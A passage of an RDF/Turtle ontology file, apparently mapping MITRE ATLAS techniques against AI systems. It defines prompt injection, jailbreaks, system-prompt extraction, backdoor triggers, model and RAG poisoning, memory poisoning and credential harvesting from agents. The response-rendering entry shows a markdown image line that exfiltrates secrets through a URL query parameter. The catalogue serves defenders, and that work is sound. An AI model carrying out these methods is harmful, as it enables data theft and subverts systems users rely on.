effective and require more inferences than [White-Box Optimization](/techniques/AML.T0043.000) attacks, but they require much less access.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0043 ; skos:prefLabel "Black-Box Optimization" . d3f:AML.T0043.002 a owl:Class ; rdfs:label "Black-Box Transfer - ATLAS" ; d3f:attack-id "AML.T0043.002" ; d3f:definition """In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy AI Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model. The adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples. If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another. This means that an attack that works for the proxy models will likely then work for the target model. If the adversary has [AI Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0043 ; skos:prefLabel "Black-Box Transfer" . d3f:AML.T0043.003 a owl:Class ; rdfs:label "Manual Modification - ATLAS" ; d3f:attack-id "AML.T0043.003" ; d3f:definition """Adversaries may manually modify the input data to craft adversarial data. They may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task. The adversary may use trial and error until they are able to verify they have a working adversarial input.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0043 ; skos:prefLabel "Manual Modification" . d3f:AML.T0043.004 a owl:Class ; rdfs:label "Insert Backdoor Trigger - ATLAS" ; d3f:attack-id "AML.T0043.004" ; d3f:definition """The adversary may add a perceptual trigger into inference data. The trigger may be imperceptible or non-obvious to humans. This technique is used in conjunction with [Poison AI Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0043 ; skos:prefLabel "Insert Backdoor Trigger" . d3f:AML.T0044 a owl:Class ; rdfs:label "Full AI Model Access - ATLAS" ; d3f:attack-id "AML.T0044" ; d3f:definition """Adversaries may gain full "white-box" access to an AI model. This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology. They may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIModelAccessTechnique ; skos:prefLabel "Full AI Model Access" . d3f:AML.T0046 a owl:Class ; rdfs:label "Spamming AI System with Chaff Data - ATLAS" ; d3f:attack-id "AML.T0046" ; d3f:definition """Adversaries may spam the AI system with chaff data that causes increase in the number of detections. This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASImpactTechnique ; skos:prefLabel "Spamming AI System with Chaff Data" . d3f:AML.T0047 a owl:Class ; rdfs:label "AI-Enabled Product or Service - ATLAS" ; d3f:attack-id "AML.T0047" ; d3f:definition """Adversaries may use a product or service that uses artificial intelligence under the hood to gain access to the underlying AI model. This type of indirect model access may reveal details of the AI model or its inferences in logs or metadata.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIModelAccessTechnique ; skos:prefLabel "AI-Enabled Product or Service" . d3f:AML.T0048.000 a owl:Class ; rdfs:label "Financial Harm - ATLAS" ; d3f:attack-id "AML.T0048.000" ; d3f:definition "Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0048 ; skos:prefLabel "Financial Harm" . d3f:AML.T0048.001 a owl:Class ; rdfs:label "Reputational Harm - ATLAS" ; d3f:attack-id "AML.T0048.001" ; d3f:definition "Reputational harm involves a degradation of public perception and trust in organizations. Examples of reputation-harming incidents include scandals or false impersonations." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0048 ; skos:prefLabel "Reputational Harm" . d3f:AML.T0048.002 a owl:Class ; rdfs:label "Societal Harm - ATLAS" ; d3f:attack-id "AML.T0048.002" ; d3f:definition "Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0048 ; skos:prefLabel "Societal Harm" . d3f:AML.T0048.003 a owl:Class ; rdfs:label "User Harm - ATLAS" ; d3f:attack-id "AML.T0048.003" ; d3f:definition "User harms may encompass a variety of harm types including financial and reputational that are directed at or felt by individual victims of the attack rather than at the organization level." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0048 ; skos:prefLabel "User Harm" . d3f:AML.T0048.004 a owl:Class ; rdfs:label "AI Intellectual Property Theft - ATLAS" ; d3f:attack-id "AML.T0048.004" ; d3f:definition """Adversaries may exfiltrate AI artifacts to steal intellectual property and cause economic harm to the victim organization. Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft. AIaaS providers charge for use of their API. An adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract AI Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0048 ; skos:prefLabel "AI Intellectual Property Theft" . d3f:AML.T0049 a owl:Class ; rdfs:label "Exploit Public-Facing Application - ATLAS" ; d3f:attack-id "AML.T0049" ; d3f:definition "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASInitialAccessTechnique ; skos:prefLabel "Exploit Public-Facing Application" . d3f:AML.T0050 a owl:Class ; rdfs:label "Command and Scripting Interpreter - ATLAS" ; d3f:attack-id "AML.T0050" ; d3f:definition """Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic. Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExecutionTechnique ; skos:prefLabel "Command and Scripting Interpreter" . d3f:AML.T0051.000 a owl:Class ; rdfs:label "Direct - ATLAS" ; d3f:attack-id "AML.T0051.000" ; d3f:definition "An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0051 ; skos:prefLabel "Direct" . d3f:AML.T0051.001 a owl:Class ; rdfs:label "Indirect - ATLAS" ; d3f:attack-id "AML.T0051.001" ; d3f:definition """An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites. These malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0051 ; skos:prefLabel "Indirect" . d3f:AML.T0051.002 a owl:Class ; rdfs:label "Triggered - ATLAS" ; d3f:attack-id "AML.T0051.002" ; d3f:definition "An adversary may trigger a prompt injection via a user action or event that occurs within the victim's environment. Triggered prompt injections often target AI agents, which can be activated by means the adversary identifies during [Discovery](/tactics/AML.TA0008) (See [Activation Triggers](/techniques/AML.T0084.002)). These malicious prompts may be hidden or obfuscated from the user and may already exist somewhere in the victim's environment from the adversary performing [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093). This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0051 ; skos:prefLabel "Triggered" . d3f:AML.T0052.000 a owl:Class ; rdfs:label "Spearphishing via Social Engineering LLM - ATLAS" ; d3f:attack-id "AML.T0052.000" ; d3f:definition """Adversaries may turn LLMs into targeted social engineers. LLMs are capable of interacting with users via text conversations. They can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers. They can be targeted towards particular personas defined by the adversary. This allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0052 ; skos:prefLabel "Spearphishing via Social Engineering LLM" . d3f:AML.T0053 a owl:Class ; rdfs:label "AI Agent Tool Invocation - ATLAS" ; d3f:attack-id "AML.T0053" ; d3f:definition """Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code. This may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions. AI agents may be configured to have access to tools that are not directly accessible by users. Adversaries may abuse this to gain access to tools they otherwise wouldn't be able to use.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExecutionTechnique, d3f:ATLASPrivilegeEscalationTechnique ; skos:prefLabel "AI Agent Tool Invocation" . d3f:AML.T0054 a owl:Class ; rdfs:label "LLM Jailbreak - ATLAS" ; d3f:attack-id "AML.T0054" ; d3f:definition """An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to place LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM. Once successfully jailbroken, the LLM can be used in unintended ways by the adversary.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique, d3f:ATLASPrivilegeEscalationTechnique ; skos:prefLabel "LLM Jailbreak" . d3f:AML.T0055 a owl:Class ; rdfs:label "Unsecured Credentials - ATLAS" ; d3f:attack-id "AML.T0055" ; d3f:definition """Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCredentialAccessTechnique ; skos:prefLabel "Unsecured Credentials" . d3f:AML.T0056 a owl:Class ; rdfs:label "Extract LLM System Prompt - ATLAS" ; d3f:attack-id "AML.T0056" ; d3f:definition """Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file. System prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExfiltrationTechnique ; skos:prefLabel "Extract LLM System Prompt" . d3f:AML.T0057 a owl:Class ; rdfs:label "LLM Data Leakage - ATLAS" ; d3f:attack-id "AML.T0057" ; d3f:definition """Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExfiltrationTechnique ; skos:prefLabel "LLM Data Leakage" . d3f:AML.T0058 a owl:Class ; rdfs:label "Publish Poisoned Models - ATLAS" ; d3f:attack-id "AML.T0058" ; d3f:definition "Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010)." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Publish Poisoned Models" . d3f:AML.T0059 a owl:Class ; rdfs:label "Erode Dataset Integrity - ATLAS" ; d3f:attack-id "AML.T0059" ; d3f:definition "Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASImpactTechnique ; skos:prefLabel "Erode Dataset Integrity" . d3f:AML.T0060 a owl:Class ; rdfs:label "Publish Hallucinated Entities - ATLAS" ; d3f:attack-id "AML.T0060" ; d3f:definition "Adversaries may create an entity they control, such as a software package, website, or email address to a source hallucinated by an LLM. The hallucinations may take the form of package names commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Publish Hallucinated Entities" . d3f:AML.T0061 a owl:Class ; rdfs:label "LLM Prompt Self-Replication - ATLAS" ; d3f:attack-id "AML.T0061" ; d3f:definition "An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057))." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASPersistenceTechnique ; skos:prefLabel "LLM Prompt Self-Replication" . d3f:AML.T0062 a owl:Class ; rdfs:label "Discover LLM Hallucinations - ATLAS" ; d3f:attack-id "AML.T0062" ; d3f:definition """Adversaries may prompt large language models and identify hallucinated entities. They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Discover LLM Hallucinations" . d3f:AML.T0063 a owl:Class ; rdfs:label "Discover AI Model Outputs - ATLAS" ; d3f:attack-id "AML.T0063" ; d3f:definition """Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses. Model outputs may enable the adversary to identify weaknesses in the model and develop attacks.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Discover AI Model Outputs" . d3f:AML.T0064 a owl:Class ; rdfs:label "Gather RAG-Indexed Targets - ATLAS" ; d3f:attack-id "AML.T0064" ; d3f:definition """Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on. RAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Gather RAG-Indexed Targets" . d3f:AML.T0065 a owl:Class ; rdfs:label "LLM Prompt Crafting - ATLAS" ; d3f:attack-id "AML.T0065" ; d3f:definition """Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed. The adversary may iterate on the prompt to ensure that it works as-intended consistently.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "LLM Prompt Crafting" . d3f:AML.T0066 a owl:Class ; rdfs:label "Retrieval Content Crafting - ATLAS" ; d3f:attack-id "AML.T0066" ; d3f:definition """Adversaries may write content designed to be retrieved by user queries and influence a user of the system in some way. This abuses the trust the user has in the system. The crafted content can be combined with a prompt injection. It can also stand alone in a separate document or email. The adversary must get the crafted content into the victim\\u0027s database, such as a vector database used in a retrieval augmented generation (RAG) system. This may be accomplished via cyber access, or by abusing the ingestion mechanisms common in RAG systems (see [RAG Poisoning](/techniques/AML.T0070)). Large language models may be used as an assistant to aid an adversary in crafting content.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Retrieval Content Crafting" . d3f:AML.T0067.000 a owl:Class ; rdfs:label "Citations - ATLAS" ; d3f:attack-id "AML.T0067.000" ; d3f:definition "Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0067 ; skos:prefLabel "Citations" . d3f:AML.T0068 a owl:Class ; rdfs:label "LLM Prompt Obfuscation - ATLAS" ; d3f:attack-id "AML.T0068" ; d3f:definition """Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection. This may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "LLM Prompt Obfuscation" . d3f:AML.T0069.000 a owl:Class ; rdfs:label "Special Character Sets - ATLAS" ; d3f:attack-id "AML.T0069.000" ; d3f:definition "Adversaries may discover delimiters and special characters sets used by the large language model. For example, delimiters used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0069 ; skos:prefLabel "Special Character Sets" . d3f:AML.T0069.001 a owl:Class ; rdfs:label "System Instruction Keywords - ATLAS" ; d3f:attack-id "AML.T0069.001" ; d3f:definition "Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0069 ; skos:prefLabel "System Instruction Keywords" . d3f:AML.T0069.002 a owl:Class ; rdfs:label "System Prompt - ATLAS" ; d3f:attack-id "AML.T0069.002" ; d3f:definition "Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0069 ; skos:prefLabel "System Prompt" . d3f:AML.T0070 a owl:Class ; rdfs:label "RAG Poisoning - ATLAS" ; d3f:attack-id "AML.T0070" ; d3f:definition """Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)). The content may be targeted such that it would always surface as a search result for a specific user query. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions, or false RAG entries.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASPersistenceTechnique ; skos:prefLabel "RAG Poisoning" . d3f:AML.T0071 a owl:Class ; rdfs:label "False RAG Entry Injection - ATLAS" ; d3f:attack-id "AML.T0071" ; d3f:definition """Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved, the LLM is tricked into treating part of the retrieved content as a false RAG result. By including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly. The adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "False RAG Entry Injection" . d3f:AML.T0072 a owl:Class ; rdfs:label "Reverse Shell - ATLAS" ; d3f:attack-id "AML.T0072" ; d3f:definition """Adversaries may utilize a reverse shell to communicate and control the victim system. Typically, a user uses a client to connect to a remote machine which is listening for connections. With a reverse shell, the adversary is listening for incoming connections initiated from the victim system.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCommandAndControlTechnique ; skos:prefLabel "Reverse Shell" . d3f:AML.T0073 a owl:Class ; rdfs:label "Impersonation - ATLAS" ; d3f:attack-id "AML.T0073" ; d3f:definition """Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing](/techniques/AML.T0052), or [Spearphishing via Social Engineering LLM](/techniques/AML.T0052.000)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary's ultimate goals, possibly against multiple victims. Adversaries may target resources that are part of the AI DevOps lifecycle, such as model repositories, container registries, and software registries.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "Impersonation" . d3f:AML.T0074 a owl:Class ; rdfs:label "Masquerading - ATLAS" ; d3f:attack-id "AML.T0074" ; d3f:definition "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "Masquerading" . d3f:AML.T0075 a owl:Class ; rdfs:label "Cloud Service Discovery - ATLAS" ; d3f:attack-id "AML.T0075" ; d3f:definition """An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2] For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4] Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Cloud Service Discovery" . d3f:AML.T0076 a owl:Class ; rdfs:label "Corrupt AI Model - ATLAS" ; d3f:attack-id "AML.T0076" ; d3f:definition "An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "Corrupt AI Model" . d3f:AML.T0077 a owl:Class ; rdfs:label "LLM Response Rendering - ATLAS" ; d3f:attack-id "AML.T0077" ; d3f:definition """An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server. The adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown For example, an LLM may produce the following markdown: ``` ![ATLAS](https://atlas.mitre.org/image.png?secrets="private data") ``` Which is rendered by the client as: ``` ``` When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExfiltrationTechnique ; skos:prefLabel "LLM Response Rendering" . d3f:AML.T0078 a owl:Class ; rdfs:label "Drive-by Compromise - ATLAS" ; d3f:attack-id "AML.T0078" ; d3f:definition """Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model. The same approach may be used to deliver other types of malicious code that don't target AI directly (See [Drive-by Compromise in ATT&CK](https://attack.mitre.org/techniques/T1189/)).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASInitialAccessTechnique ; skos:prefLabel "Drive-by Compromise" . d3f:AML.T0079 a owl:Class ; rdfs:label "Stage Capabilities - ATLAS" ; d3f:attack-id "AML.T0079" ; d3f:definition """Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries. Adversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Stage Capabilities" . d3f:AML.T0080.000 a owl:Class ; rdfs:label "Memory - ATLAS" ; d3f:attack-id "AML.T0080.000" ; d3f:definition """Adversaries may manipulate the memory of a large language model (LLM) in order to persist changes to the LLM to future chat sessions. Memory is a common feature in LLMs that allows them to remember information across chat sessions by utilizing a user-specific database. Because the memory is controlled via normal conversations with the user (e.g. "remember my preference for ...") an adversary can inject memories via Direct or Indirect Prompt Injection. Memories may contain malicious instructions (e.g. instructions that leak private conversations) or may promote the adversary's hidden agenda (e.g. manipulating the user).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0080 ; skos:prefLabel "Memory" . d3f:AML.T0080.001 a owl:Class ; rdfs:label "Thread - ATLAS" ; d3f:attack-id "AML.T0080.001" ; d3f:definition """Adversaries may introduce malicious instructions into a chat thread of a large language model (LLM) to cause behavior changes which persist for the remainder of the thread. A chat thread may continue for an extended period over multiple sessions. The malicious instructions may be introduced via Direct or Indirect Prompt Injection. Direct Injection may occur in cases where the adversary has acquired a user's LLM API keys and can inject queries directly into any thread. As the token limits for LLMs rise, AI systems can make use of larger context windows which allow malicious instructions to persist longer in a thread. Thread Poisoning may affect multiple users if the LLM is being used in a service with shared threads. For example, if an agent is active in a Slack channel with multiple participants, a single malicious message from one user can influence the agent's behavior in future interactions with others.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0080 ; skos:prefLabel "Thread" . d3f:AML.T0081 a owl:Class ; rdfs:label "Modify AI Agent Configuration - ATLAS" ; d3f:attack-id "AML.T0081" ; d3f:definition """Adversaries may modify the configuration files for AI agents on a system. This allows malicious changes to persist beyond the life of a single agent and affects any agents that share the configuration. Configuration changes may include modifications to the system prompt, tampering with or replacing knowledge sources, modification to settings of connected tools, and more. Through those changes, an attacker could redirect outputs or tools to malicious services, embed covert instructions that exfiltrate data, or weaken security controls that normally restrict agent behavior.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASPersistenceTechnique ; skos:prefLabel "Modify AI Agent Configuration" . d3f:AML.T0082 a owl:Class ; rdfs:label "RAG Credential Harvesting - ATLAS" ; d3f:attack-id "AML.T0082" ; d3f:definition "Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCredentialAccessTechnique ; skos:prefLabel "RAG Credential Harvesting" . d3f:AML.T0083 a owl:Class ; rdfs:label "Credentials from AI Agent Configuration - ATLAS" ; d3f:attack-id "AML.T0083" ; d3f:definition """Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent. AI Agents often utilize external tools or services to take actions, such as querying databases, invoking APIs, or interacting with cloud resources. To enable these functions, credentials like API keys, tokens, and connection strings are frequently stored in configuration files. While there are secure methods such as dedicated secret managers or encrypted vaults that can be deployed to store and manage these credentials, in practice they are often placed in less protected locations for convenience or ease of deployment. If an attacker can read or extract these configurations, they may obtain valid credentials that allow direct access to sensitive systems outside the agent itself.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCredentialAccessTechnique ; skos:prefLabel "Credentials from AI Agent Configuration" . d3f:AML.T0084.000 a owl:Class ; rdfs:label "Embedded Knowledge - ATLAS" ; d3f:attack-id "AML.T0084.000" ; d3f:definition """Adversaries may attempt to discover the data sources a particular agent can access. The AI agent's configuration may reveal data sources or knowledge. The embedded knowledge may include sensitive or proprietary material such as intellectual property, customer data, internal policies, or even credentials. By mapping what knowledge an agent has access to, an adversary can better understand the AI agent's role and potentially expose confidential information or pinpoint high-value targets for further exploitation.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0084 ; skos:prefLabel "Embedded Knowledge" . d3f:AML.T0084.001 a owl:Class ; rdfs:label "Tool Definitions - ATLAS" ; d3f:attack-id "AML.T0084.001" ; d3f:definition "Adversaries may discover the tools the AI agent has access to. By identifying which tools are available, the adversary can understand what actions may be executed through the agent and what additional resources it can reach. This knowledge may reveal access to external data sources such as OneDrive or SharePoint, or expose exfiltration paths like the ability to send emails, helping adversaries identify AI agents that provide the greatest value or opportunity for attack." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0084 ; skos:prefLabel "Tool Definitions" . d3f:AML.T0084.002 a owl:Class ; rdfs:label "Activation Triggers - ATLAS" ; d3f:attack-id "AML.T0084.002" ; d3f:definition """Adversaries may discover keywords or other triggers (such as incoming emails, documents being added, incoming message, or other workflows) that activate an agent and may cause it to run additional actions. Understanding these triggers can reveal how the AI agent is activated 